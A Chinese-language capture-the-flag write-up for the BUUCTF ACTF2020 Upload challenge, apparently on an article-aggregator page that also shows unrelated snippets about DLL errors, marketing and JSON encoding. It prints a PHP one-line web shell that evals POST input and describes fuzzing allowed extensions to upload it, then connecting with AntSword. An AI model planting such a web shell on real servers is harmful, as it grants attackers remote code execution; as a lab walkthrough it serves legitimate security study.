news 2026/5/1 6:57:14

BUUCTF-[ACTF2020 新生赛]Upload

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
BUUCTF-[ACTF2020 新生赛]Upload

打开靶机后发现是一个文件上传的题目

随便上传一个文件观察路径和返回的方式是什么

发现只能上传jpg,png,gif的文件

上传一个jpg文件

发现页面会回显返回的路径

既然有路径了我们就可以尝试上传一句话木马了

构造一句话木马

<?php

@eval($_POST['rc']);

?>

导入字典观察过滤的哪些后缀

发现基本都没过滤

那就找到返回最长的发送过去

上传成功

蚁剑连接

在根目录中便可找到flag

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/18 13:03:04

系统无法找到msvcr110.dll文件 如何修复? 附免费下载方法分享

在使用电脑系统时经常会出现丢失找不到某些文件的情况&#xff0c;由于很多常用软件都是采用 Microsoft Visual Studio 编写的&#xff0c;所以这类软件的运行需要依赖微软Visual C运行库&#xff0c;比如像 QQ、迅雷、Adobe 软件等等&#xff0c;如果没有安装VC运行库或者安装…

作者头像 李华
网站建设 2026/5/1 5:42:43

GEO营销全链路方案:附近搜索引流 + 到店优惠 + 会员裂变

一、方案概述本方案为实体门店打造基于地理位置&#xff08;GEO&#xff09;的数字化营销闭环&#xff0c;通过“线上精准引流-到店转化锁客-会员裂变增长”全链路设计&#xff0c;实现低成本、高效率的客源增长。二、核心玩法架构text附近搜索引流 → 到店专享优惠 → 会员体系…

作者头像 李华
网站建设 2026/4/26 17:46:00

JSON文件中显示为 \uXXXX 字符 的解决办法

在JSON文件中&#xff0c;有些字段值是直接使用汉字&#xff0c;而有些字段值则是以 \u 开头的字符&#xff0c;这是因为&#xff1a;✅ 正确显示的汉字&#xff1a;这些是正常编码的中文字符&#xff0c;文件保存格式为 UTF-8&#xff0c;浏览器或编辑器能正确识别并显示为中文…

作者头像 李华